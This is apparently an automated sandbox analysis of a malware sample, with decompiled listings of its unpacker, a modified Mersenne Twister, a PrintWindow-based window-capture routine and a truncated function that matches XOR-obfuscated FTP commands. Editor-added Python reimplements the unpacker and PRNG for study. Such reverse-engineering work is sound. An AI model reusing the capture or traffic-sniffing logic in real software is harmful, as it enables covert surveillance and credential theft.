    • Instruction ID: ee94607f001413235f200fca77bdf514b41922a2640aec83ec5b9f8aeb6c8548
    • Opcode Fuzzy Hash: ad2754d04f935819338fa239dfe4fe083a04389e42129f0e7cc6df87192f32c2
    • Instruction Fuzzy Hash: 5381B5319893918BC795EF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00409BD8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				unsigned int _t67;
    				signed int _t68;
    				intOrPtr _t71;
    				void* _t79;
    				signed int _t81;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				signed int _t98;
    				signed int _t99;
    				signed int _t100;
    				signed int _t101;
    				signed int _t102;
    				unsigned int _t103;
    				signed int _t104;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t115;
    				signed int _t116;
    				intOrPtr* _t119;
    				unsigned int _t125;
    				signed int _t126;
    				signed int _t128;
    
    				_t71 = _a4;
    				_t98 = 0;
    				_t99 = 0;
    				_v16 = 0;
    				_v20 = 1;
    				L1:
    				while(1) {
    					if(_t99 == 0) {
    						_t103 =  *(_t98 + _t71);
    						_t98 = _t98 + 4;
    						_t99 = 0x1f;
    						_t104 = _t103 >> 0x1f;
    					} else {
    						_t99 = _t99 - 1;
    						_t104 = _t67 >> _t99 & 0x00000001;
    					}
    					if(_t104 != 0) {
    						_v16 = _v16 + 1;
    						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
    						_t98 = _t98 + 1;
    						L6:
    						_t71 = _a4;
    						continue;
    					}
    					_v12 = 1;
    					do {
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t100 = 0x1f;
    							_t106 = _t67 >> 0x1f;
    						} else {
    							_t100 = _t99 - 1;
    							_t106 = _t67 >> _t100 & 0x00000001;
    						}
    						_v12 = _t106 + _v12 * 2;
    						if(_t100 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t108 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t100 - 1;
    							_t108 = _t67 >> _t99 & 0x00000001;
    						}
    					} while (_t108 == 0);
    					_t111 = _v12;
    					if(_t111 == 2) {
    						_t81 = _v20;
    						L19:
    						_v12 = _t81;
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t101 = 0x1f;
    							_v8 = _t67 >> 0x1f;
    						} else {
    							_t101 = _t99 - 1;
    							_v8 = _t67 >> _t101 & 0x00000001;
    						}
    						if(_t101 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t115 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t101 - 1;
    							_t115 = _t67 >> _t99 & 0x00000001;
    						}
    						_t116 = _t115 + _v8 * 2;
    						_v8 = _t116;
    						if(_t116 == 0) {
    							_v8 = 1;
    							do {
    								if(_t99 == 0) {
    									_t125 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t102 = 0x1f;
    									_t126 = _t125 >> 0x1f;
    								} else {
    									_t102 = _t99 - 1;
    									_t126 = _t67 >> _t102 & 0x00000001;
    								}
    								_v8 = _t126 + _v8 * 2;
    								if(_t102 == 0) {
    									_t67 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t99 = 0x1f;
    									_t128 = _t67 >> 0x1f;
    								} else {
    									_t99 = _t102 - 1;
    									_t128 = _t67 >> _t99 & 0x00000001;
    								}
    							} while (_t128 == 0);
    							_v8 = _v8 + 2;
    						}
    						asm("sbb ecx, ecx");
    						_v8 = _v8 +  ~0xd00;
    						_t87 = _v16;
    						_t119 = _t87 - _v12 + _a12;
    						_v16 = _t119;
    						 *((char*)(_t87 + _a12)) =  *_t119;
    						_t88 = _t87 + 1;
    						_v16 = _v16 + 1;
    						do {
    							 *((char*)(_t88 + _a12)) =  *_v16;
    							_t88 = _t88 + 1;
    							_v16 = _v16 + 1;
    							_t57 =  &_v8;
    							 *_t57 = _v8 - 1;
    						} while ( *_t57 != 0);
    						_v16 = _t88;
    						goto L6;
    					}
    					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
    					_t98 = _t98 + 1;
    					if(_t79 != 0xffffffff) {
    						_t81 = _t79 + 1;
    						_v20 = _t81;
    						goto L19;
    					}
    					_t68 = _a16;
    					 *_t68 = _v16;
    					return _t68 & 0xffffff00 | _t98 == _a8;
    				}
    			}
    Address column for the listing above: 0x00409bdf to 0x00409d9f (entries of 0x00000000 carry no address).

    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
    • Instruction ID: 29e2a8d33b46208c2f9b4f3b524dc552ea55eef337b6bafcba57101aa6beebb7
    • Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
    • Instruction Fuzzy Hash: 5651C032E04A259BEB14CE58C4506ADF7B1EF85324F1A42BACD16BF3C6C634AD41DB84
    Uniqueness

    Uniqueness Score: -1.00%
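    E00409BD8 is a bit-oriented LZ decoder. Its bit source refills from a 32-bit little-endian word in the input (counter set to 0x1f, first bit taken from bit 31), so flag words and literal bytes share one stream. A 1 bit copies a literal; a 0 bit starts a match whose offset is a prefix ("gamma") code: code 2 reuses the previous offset (_v20, initialised to 1), any other code becomes ((code - 3) << 8 | next byte) + 1, and the value 0xffffffff ends the stream (the function then stores the output length through _a16 and returns whether the whole input was consumed). The length is two bits, or, when those are zero, another gamma code plus 2; the garbled `_v8 = _v8 + ~0xd00` step is read here as "add one when the offset exceeds 0xd00", and the copy loop writes m_len + 1 bytes one at a time so overlapping matches work. That is the token grammar of UCL's NRV2B format. The Python below is an example added by the editor, not code from the sample or from the Joe Sandbox report: a decoder following that grammar, plus a token-level writer (no match search) used only to construct the test stream.

```python
"""NRV2B-style decoder following the token grammar of E00409BD8.
Editor's example for this report, not code from the sample or from Joe Sandbox."""
import struct


class BitReader:
    """32-bit little-endian bit words consumed MSB first, interleaved in one stream
    with literal bytes (the listing's refill sets the counter to 0x1f, takes bit 31)."""

    def __init__(self, src):
        self.src, self.ip, self.bb, self.bits = src, 0, 0, 0

    def getbit(self):
        if self.bits == 0:
            self.bb = struct.unpack_from("<I", self.src, self.ip)[0]
            self.ip += 4
            self.bits = 32
        self.bits -= 1
        return (self.bb >> self.bits) & 1

    def getbyte(self):
        self.ip += 1
        return self.src[self.ip - 1]


def gamma(r):
    """Prefix code for offsets and long lengths: start at 1, shift in a data bit,
    stop when the following flag bit is 1; always yields a value >= 2."""
    v = 1
    while True:
        v = (v << 1) | r.getbit()
        if r.getbit():
            return v


def nrv2b_decompress(src):
    """Returns (output, bytes consumed); the listing stores len(output) via _a16."""
    r, out, last_off = BitReader(src), bytearray(), 1      # _v20 = 1
    while True:
        if r.getbit():                                       # 1: literal byte follows
            out.append(r.getbyte())
            continue
        code = gamma(r)
        if code == 2:                                        # reuse previous offset
            off = last_off
        else:
            off = (((code - 3) << 8) | r.getbyte()) & 0xFFFFFFFF
            if off == 0xFFFFFFFF:                            # end-of-stream marker
                break
            off += 1
            last_off = off
        m_len = (r.getbit() << 1) | r.getbit()
        if m_len == 0:                                       # long length: gamma + 2
            m_len = gamma(r) + 2
        if off > 0xD00:                                      # the 'sbb ecx, ecx' step
            m_len += 1
        if off > len(out):
            raise ValueError("offset %d reaches before the output start" % off)
        pos = len(out) - off
        for _ in range(m_len + 1):                           # m_len + 1 bytes, overlap-safe
            out.append(out[pos])
            pos += 1
    return bytes(out), r.ip


class BitWriter:
    """Mirror of BitReader: reserves a 4-byte slot when a bit group starts, so words
    and literal bytes land exactly where the decoder will look for them."""

    def __init__(self):
        self.buf, self.slot, self.bb, self.bits = bytearray(), 0, 0, 0

    def putbit(self, bit):
        if self.bits == 0:
            self.slot = len(self.buf)
            self.buf += b"\0\0\0\0"
        self.bb, self.bits = (self.bb << 1) | (bit & 1), self.bits + 1
        if self.bits == 32:
            struct.pack_into("<I", self.buf, self.slot, self.bb)
            self.bb = self.bits = 0

    def putbyte(self, b):
        self.buf.append(b)

    def putgamma(self, v):
        assert v >= 2, "gamma code cannot express values below 2"
        for i in range(v.bit_length() - 2, -1, -1):         # bits below the leading 1
            self.putbit((v >> i) & 1)
            self.putbit(1 if i == 0 else 0)

    def finish(self):
        if self.bits:
            struct.pack_into("<I", self.buf, self.slot, self.bb << (32 - self.bits))
        return bytes(self.buf)


def encode_tokens(tokens):
    """Writer for ('lit', byte) / ('match', offset, length) tokens; no match search."""
    w, last_off = BitWriter(), 1
    for tok in tokens:
        if tok[0] == "lit":
            w.putbit(1)
            w.putbyte(tok[1])
            continue
        _, off, length = tok
        w.putbit(0)
        if off == last_off:
            w.putgamma(2)
        else:
            w.putgamma(((off - 1) >> 8) + 3)
            w.putbyte((off - 1) & 0xFF)
            last_off = off
        m_len = length - 1 - (1 if off > 0xD00 else 0)
        assert m_len >= 1, "match too short for this grammar"
        if m_len <= 3:
            w.putbit(m_len >> 1)
            w.putbit(m_len & 1)
        else:
            w.putbit(0)
            w.putbit(0)
            w.putgamma(m_len - 2)
    w.putbit(0)                                              # end marker -> 0xFFFFFFFF
    w.putgamma(0x1000002)
    w.putbyte(0xFF)
    return w.finish()


# Constructed test stream: three literals, an overlapping match, a literal, a long
# match, then the same match again so the 'repeat offset' code (2) is exercised.
PLAIN = b"abcabcabcabc!" * 3
SAMPLE = encode_tokens([("lit", 0x61), ("lit", 0x62), ("lit", 0x63),
                        ("match", 3, 9), ("lit", 0x21),
                        ("match", 13, 13), ("match", 13, 13)])

if __name__ == "__main__":
    out, used = nrv2b_decompress(SAMPLE)
    assert out == PLAIN and used == len(SAMPLE)
    print(len(SAMPLE), "->", len(out), out)
```

    The 19-byte constructed stream expands to 39 bytes; `used == len(SAMPLE)` is the same end-of-input check the listing returns in its low byte. To try the decoder on a real blob from this sample, pass the raw compressed bytes and the expected output size is whatever the caller stored through _a16.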

    C-Code - Quality: 100%
    			E00408036() {
    				signed int _t23;
    				signed int _t43;
    				signed int _t59;
    				signed int* _t63;
    				signed int _t64;
    
    				_t23 =  *0x4231ac;
    				if(_t23 >= 0x270) {
    					_t64 = 0;
    					do {
    						_t59 = _t64;
    						_t64 = _t64 + 1;
    						0x4227e0[_t59] = (( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x4227e4 + _t59 * 4) ^ 0x4227e0[_t59]) & 0x7fffffff ^ 0x4227e0[_t59]) & 0x00000001) * 4) ^  *(0x422e14 + _t59 * 4);
    					} while (_t64 < 0xe3);
    					if(_t64 < 0x26f) {
    						_t63 =  &(0x4227e0[_t64]);
    						do {
    							 *_t63 =  *(0x4223a0 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
    							_t63 =  &(_t63[1]);
    						} while (_t63 < 0x42319c);
    					}
    					_t43 =  *0x4227e0; // 0x0
    					 *0x42319c = ((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) >> 0x00000001 ^  *(0x4223a0 + (((_t43 ^  *0x42319c) & 0x7fffffff ^  *0x42319c) & 0x00000001) * 4) ^  *0x422e10;
    					_t23 = 0;
    				}
    				 *0x4231ac = _t23 + 1;
    				return (0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b ^ ((0x4227e0[_t23] ^ 0x4227e0[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}
    Address column for the listing above: 0x00408036 to 0x00408129.

    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b5de11fac561b98fbc0269d30167c51b7fb7d387712774ba005d8830153e5700
    • Instruction ID: 63e6a8de148f0bc1d0fb5d2126a7c73a6e06c7c5166c9d567d207dae7b3003da
    • Opcode Fuzzy Hash: b5de11fac561b98fbc0269d30167c51b7fb7d387712774ba005d8830153e5700
    • Instruction Fuzzy Hash: DE218132330400ABD768DF3DED5961633E2E78A35439A853DD655D32A0DA79E913CB1C
    Uniqueness

    Uniqueness Score: -1.00%
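    E00408036 is the output step of a 624-word Mersenne Twister. When the index at 0x4231ac reaches 0x270 (624) it regenerates the state array at 0x4227e0 in the usual three pieces (0xe3 = 227 = 624 - 397 iterations, then up to element 623 using the -0x38c = -227*4 back-reference, then the last element from state[396] at 0x422e10), which fixes M = 397 as in MT19937; the two-entry table at 0x4223a0 indexed by the low bit plays the role of mag01. The returned value is the state word tempered with shifts 11, 7, 15, 18, but the two AND-masks are 0xff3a58ad and 0xffffdf8c instead of MT19937's 0x9d2c5680 and 0xefc60000, so the sample's stream differs from a stock generator fed the same state. The Python below is an example added by the editor, not the sample's code: a twister parameterised on the masks, cross-checked with the standard masks against CPython's random module (itself MT19937) by loading the same untempered state with setstate. Assumptions: the table at 0x4223a0 is taken to be {0, 0x9908b0df} (its contents are not shown in this report), and because the sample's seeding routine is not on this page the reference init_genrand is used.

```python
"""Mersenne Twister with the structure of E00408036 (624 words, M = 397), parameterised
on the two tempering AND-masks. Editor's example; not the sample's code."""
import random

N, M = 624, 397
UPPER, LOWER = 0x80000000, 0x7FFFFFFF
MATRIX_A = 0x9908B0DF                    # ASSUMED: the table at 0x4223a0 is not shown
MT_STANDARD = (0x9D2C5680, 0xEFC60000)   # reference MT19937 masks
MT_SAMPLE = (0xFF3A58AD, 0xFFFFDF8C)     # masks hard-coded in E00408036


def temper(y, masks=MT_STANDARD):
    """The return expression of E00408036: shifts 11, 7, 15, 18 with the given masks."""
    b, c = masks
    y ^= y >> 11
    y ^= (y << 7) & b
    y ^= (y << 15) & c
    y ^= y >> 18
    return y & 0xFFFFFFFF


class MT19937:
    def __init__(self, seed, masks=MT_STANDARD):
        self.masks = masks
        self.mt = [seed & 0xFFFFFFFF]
        for i in range(1, N):            # reference init_genrand (sample's seeding not shown)
            prev = self.mt[-1]
            self.mt.append((1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF)
        self.index = N                   # first call twists, like the >= 0x270 test

    def twist(self):
        mt = self.mt
        for i in range(N):               # the listing unrolls this as 227 + 396 + 1 steps
            y = (mt[i] & UPPER) | (mt[(i + 1) % N] & LOWER)   # ((a ^ b) & 0x7fffffff) ^ a
            mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        self.index = 0

    def genrand(self):
        if self.index >= N:
            self.twist()
        y = self.mt[self.index]
        self.index += 1
        return temper(y, self.masks)


def agrees_with_cpython(seed=5489, count=1300):
    """CPython's random is MT19937: load our untempered state into it with setstate
    and compare outputs across more than one twist. Only the standard masks pass."""
    ours = MT19937(seed)
    ref = random.Random()
    ref.setstate((3, tuple(ours.mt) + (ours.index,), None))
    return all(ours.genrand() == ref.getrandbits(32) for _ in range(count))


def first_outputs(seed, masks, n=3):
    """Outputs of a generator seeded with the reference init_genrand and the given masks."""
    g = MT19937(seed, masks)
    return [g.genrand() for _ in range(n)]


if __name__ == "__main__":
    print("twist/temper match CPython:", agrees_with_cpython())
    print("standard masks, seed 5489:", first_outputs(5489, MT_STANDARD))
    print("sample masks,   seed 5489:", first_outputs(5489, MT_SAMPLE))
```

    With the standard masks the class reproduces MT19937's well-known first output for seed 5489 (3499211612) and stays in step with CPython for 1300 draws, i.e. through a second twist, which validates the state update read off the listing; swapping in MT_SAMPLE changes only the tempering, so any attempt to predict the sample's values with an off-the-shelf MT19937 has to carry these masks.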

    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction ID: a6f42419d81c7f93f1778707cbdc58ee93fc113079310d97c45b8dabfca5cd04
    • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction Fuzzy Hash: E5E0267A3400158BC700CE11D980D83F7A6FBD8330B1286A5C825C7349C938EEC3C9D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E004050A4(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
    				char _v9;
    				signed int _v10;
    				int _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				void* _v68;
    				signed int _v72;
    				int _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				int _v88;
    				int _v92;
    				struct HDC__* _v96;
    				struct HWND__* _v100;
    				void _v104;
    				intOrPtr _v140;
    				intOrPtr _v156;
    				struct tagWINDOWINFO _v164;
    				signed int _t128;
    				signed int _t135;
    				void* _t140;
    				void* _t146;
    				signed int _t164;
    				intOrPtr _t191;
    				long _t192;
    				intOrPtr _t195;
    				long _t196;
    				long _t210;
    				long _t211;
    				long _t212;
    				long _t213;
    				signed int _t214;
    				signed int _t215;
    				RECT* _t216;
    				struct HDC__* _t217;
    				struct HDC__* _t221;
    
    				_t214 = __edx;
    				_t216 = __eax;
    				_t128 = E0040D568(_a8) & 0x0000ffff;
    				_v16 = _t128;
    				if((_t128 & 0x00000001) == 0) {
    					if(_t128 == 0) {
    						_v16 = 2;
    						_t128 = _v16;
    					}
    					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
    						_v16 = _t128 & 0x0000fffd | 0x00000008;
    					}
    					_v24 = 0;
    					_v20 = 0;
    					_v28 = 0;
    					_v32 = 0;
    					_v164.cbSize = 0x3c;
    					if(GetWindowInfo(_a8,  &_v164) != 0) {
    						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
    						_v10 = _t215;
    						if(_t215 != 0) {
    							_t212 = _t216->top;
    							_t195 = _v156;
    							if(_t195 < _t212) {
    								_v20 = _t195 - _t212;
    							}
    							_t213 = _t216->left;
    							_t196 = _v164.rcWindow.left;
    							if(_t196 < _t213) {
    								_v24 = _t196 - _t213;
    							}
    						}
    						_t135 = _v16 & 0x00000002;
    						_v72 = _t135;
    						if(_t135 == 0) {
    							_a15 = _t215;
    						} else {
    							if((_v164.dwStyle & 0x20000000) == 0) {
    								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
    								if(_a15 != 0) {
    									_t210 = _t216->top;
    									_t191 = _v140;
    									if(_t191 < _t210) {
    										_v32 = _t191 - _t210;
    									}
    									_t211 = _t216->left;
    									_t192 = _v164.rcClient.left;
    									if(_t192 < _t211) {
    										_v28 = _t192 - _t211;
    									}
    								}
    							} else {
    								_a15 = 0;
    							}
    						}
    						if(_v10 != 0 || _a15 != 0) {
    							_t217 = GetDC(0);
    							if(_t217 == 0) {
    								goto L8;
    							}
    							_t221 = CreateCompatibleDC(_t217);
    							ReleaseDC(0, _t217);
    							if(_t221 == 0) {
    								goto L8;
    							}
    							_t218 = _a4;
    							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
    							_v68 = _t140;
    							if(_t140 != 0) {
    								_v9 = 1;
    								if(_v72 == 0) {
    									if((_v16 & 0x00000004) == 0) {
    										if((_v16 & 0x00000008) == 0) {
    											L56:
    											SelectObject(_t221, _v68);
    											DeleteDC(_t221);
    											return _v9;
    										}
    										if(_v24 != 0 || _v20 != 0) {
    											SetViewportOrgEx(_t221, _v24, _v20, 0);
    										}
    										_t146 = E00404FC2(_t218,  &_v64, 0);
    										__imp__PrintWindow(_a8, _t221, 0);
    										if(_t146 != 0) {
    											L55:
    											E00404FC2(_t218,  &_v64, 1);
    										} else {
    											_v9 = 0;
    										}
    										goto L56;
    									}
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E00404FC2(_t218,  &_v64, 0);
    									DefWindowProcW(_a8, 0x317, _t221, 0xe);
    									goto L55;
    								}
    								_v100 = _a8;
    								_v96 = _t221;
    								_v84 = _v48.right - _v48.left;
    								_v76 = 1;
    								_v80 = _v48.bottom - _v48.top;
    								_v92 = 0;
    								_v88 = 0;
    								TlsSetValue( *0x4231bc,  &_v104);
    								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
    									_v16 = SaveDC(_t221);
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E00404FC2(_a4,  &_v64, 0);
    									_v104 = 0;
    									SendMessageW(_a8, 0x85, 1, 0);
    									if(_v104 == 0) {
    										DefWindowProcW(_a8, 0x317, _t221, 2);
    									}
    									E00404FC2(_a4,  &_v64, 1);
    									RestoreDC(_t221, _v16);
    								}
    								if(_a15 != 1) {
    									L49:
    									TlsSetValue( *0x4231bc, 0);
    									goto L56;
    								} else {
    									if(_v28 != 0) {
    										L41:
    										_a15 = 1;
    										L42:
    										_v16 = SaveDC(_t221);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										E00404FC2(_a4,  &_v48, 0);
    										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
    										asm("sbb eax, eax");
    										_v76 =  ~_t164 + 1;
    										RestoreDC(_t221, _v16);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										_v104 = 0;
    										SendMessageW(_a8, 0xf, 0, 0);
    										if(_v104 == 0) {
    											DefWindowProcW(_a8, 0x317, _t221, 4);
    										}
    										E00404FC2(_a4,  &_v48, 1);
    										goto L49;
    									}
    									_a15 = 0;
    									if(_v32 == 0) {
    										goto L42;
    									}
    									goto L41;
    								}
    							}
    							DeleteDC(_t221);
    							goto L8;
    						} else {
    							goto L1;
    						}
    					}
    					L8:
    					return 0;
    				}
    				L1:
    				return 1;
    			}
    Address column for the listing above: 0x004050a4 to 0x0040542e (entries of 0x00000000 carry no address).

    APIs
      • Part of subcall function 0040D568: GetClassNameW.USER32 ref: 0040D583
    • GetWindowInfo.USER32 ref: 00405110
    • SelectObject.GDI32(00000000,?), ref: 004053DF
    • DeleteDC.GDI32(00000000), ref: 004053E6
    • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040540E
    • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00405424
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
    • String ID: <
    • API String ID: 3458064076-4251816714
    • Opcode ID: 2ce3b519abf72b57e3baa0ea61d4ec2de073a69e3078cc1c57a830c6a460abe0
    • Instruction ID: 89271e606109fe184fbca3a54436a17adbda24e09563d6d30808168a8dbda32b
    • Opcode Fuzzy Hash: 2ce3b519abf72b57e3baa0ea61d4ec2de073a69e3078cc1c57a830c6a460abe0
    • Instruction Fuzzy Hash: 6CC16A71D01249AFDF119FA4DD84AEFBBB9EF05340F04806AF911B62A0D7788A45DF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0041A205(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
    				char _v536;
    				char _v652;
    				char _v664;
    				char _v696;
    				char _v700;
    				char _v701;
    				char _v708;
    				void* __esi;
    				char* _t35;
    				void* _t40;
    				char* _t43;
    				intOrPtr _t44;
    				void* _t47;
    				void* _t54;
    				void* _t56;
    				intOrPtr _t57;
    				signed int _t58;
    				signed int _t60;
    				void* _t61;
    				signed int* _t71;
    				intOrPtr _t73;
    				signed int _t75;
    				signed char _t76;
    				intOrPtr _t79;
    				signed int _t80;
    				intOrPtr _t83;
    				signed int* _t84;
    				intOrPtr _t85;
    				void* _t87;
    				char* _t92;
    				void* _t93;
    				intOrPtr* _t94;
    
    				_t80 = __edx;
    				_t87 = __eax;
    				_t71 = __ecx;
    				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
    					L51:
    					_t35 = 0;
    					__eflags = 0;
    				} else {
    					if(__eax <= 6) {
    						L24:
    						__eflags = _t87 - 1;
    						if(_t87 <= 1) {
    							goto L51;
    						} else {
    							EnterCriticalSection(0x423fc4);
    							_t83 = E0041A0FD(_a4);
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags =  *((intOrPtr*)(_t83 + 4));
    								if( *((intOrPtr*)(_t83 + 4)) == 0) {
    									L48:
    									_push(0);
    									goto L49;
    								} else {
    									__eflags =  *((intOrPtr*)(_t83 + 8));
    									if( *((intOrPtr*)(_t83 + 8)) == 0) {
    										goto L48;
    									} else {
    										__eflags = _t87 - 3;
    										if(_t87 < 3) {
    											L33:
    											__eflags = _t87 - 4;
    											if(_t87 >= 4) {
    												_t75 =  *_t71 ^ 0x07070707;
    												__eflags = _t75 - 0x42575e53;
    												if(_t75 == 0x42575e53) {
    													goto L37;
    												} else {
    													__eflags = _t75 - 0x53464241;
    													if(_t75 == 0x53464241) {
    														goto L37;
    													} else {
    														__eflags = _t75 - 0x51544657;
    														if(_t75 != 0x51544657) {
    															__eflags = _t75 - 0x53465354;
    															if(_t75 == 0x53465354) {
    																L40:
    																_t76 = 0x65;
    																_push(0x15);
    																goto L41;
    															} else {
    																__eflags = _t75 - 0x53544e4b;
    																if(_t75 == 0x53544e4b) {
    																	goto L40;
    																}
    															}
    														} else {
    															goto L37;
    														}
    													}
    												}
    											}
    										} else {
    											_t58 =  *_t71;
    											__eflags = _t58 - 0x43;
    											if(_t58 == 0x43) {
    												L31:
    												__eflags = _t71[0] - 0x57;
    												if(_t71[0] != 0x57) {
    													goto L33;
    												} else {
    													__eflags = _t71[0] - 0x44;
    													if(_t71[0] == 0x44) {
    														L37:
    														_t76 = 0x64;
    														_push(0x14);
    														L41:
    														_pop(_t40);
    														E00405B00(_t40,  &_v696);
    														_t43 =  &_v652;
    														_v700 = 0x80;
    														__imp__#5(_a4, _t43,  &_v700);
    														__eflags = _t43;
    														if(_t43 == 0) {
    															_t78 =  &_v664;
    															_t44 = E0040A32F( &_v664);
    															__eflags = _t44;
    															if(_t44 == 0) {
    																__eflags = _t76 - 0x65;
    																if(_t76 == 0x65) {
    																	L46:
    																	E0040A2E6( &_v664, _t78,  &_v536);
    																	_t47 = 0x13;
    																	E00405B00(_t47,  &_v696);
    																	_push( &_v536);
    																	_push( *((intOrPtr*)(_t83 + 8)));
    																	_push( *((intOrPtr*)(_t83 + 4)));
    																	E0040ED2D(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
    																} else {
    																	__eflags = _t76 - 0x64;
    																	if(_t76 == 0x64) {
    																		_t92 =  &_v696;
    																		_t54 = 0x16;
    																		E00405B00(_t54, _t92);
    																		_push( *((intOrPtr*)(_t83 + 4)));
    																		_t80 = _t80 | 0xffffffff;
    																		_t56 = 9;
    																		_t78 = _t92;
    																		_t57 = E00407A95(_t56, _t92, _t80);
    																		__eflags = _t57;
    																		if(_t57 != 0) {
    																			goto L46;
    																		}
    																	}
    																}
    															}
    														}
    														_push(0);
    														L49:
    														E0041A19C(_t83);
    													} else {
    														goto L33;
    													}
    												}
    											} else {
    												__eflags = _t58 - 0x50;
    												if(_t58 != 0x50) {
    													goto L33;
    												} else {
    													goto L31;
    												}
    											}
